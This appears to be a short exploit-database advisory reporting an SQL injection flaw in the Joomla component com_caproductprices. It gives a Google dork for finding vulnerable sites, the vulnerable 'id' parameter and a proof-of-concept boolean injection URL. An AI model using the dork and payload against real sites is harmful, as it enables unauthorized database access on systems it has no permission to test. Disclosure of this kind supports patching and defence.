################################################################################################ # Exploit Title: Joomla Component (com_caproductprices) SQL Injection Vulnerability # # Author : CoBRa_21 # # E-Mail : uyku_cu [at] windowslive.com # # Google Dork : inurl:com_caproductprices # # Status : High-Risk # ################################################################################################ # # SQL Vulnerability # # http://127.0.0.1/[PATH]/index.php?option=com_caproductprices&Itemid=&task=graph&id=83 (SQL) # # SQL Exploit # # http://127.0.0.1/[PATH]/index.php?option=com_caproductprices&Itemid=&task=graph&id=83+and+1=2 # ################################################################################################ # ( Vulnerability Researcher ) ################################################################################################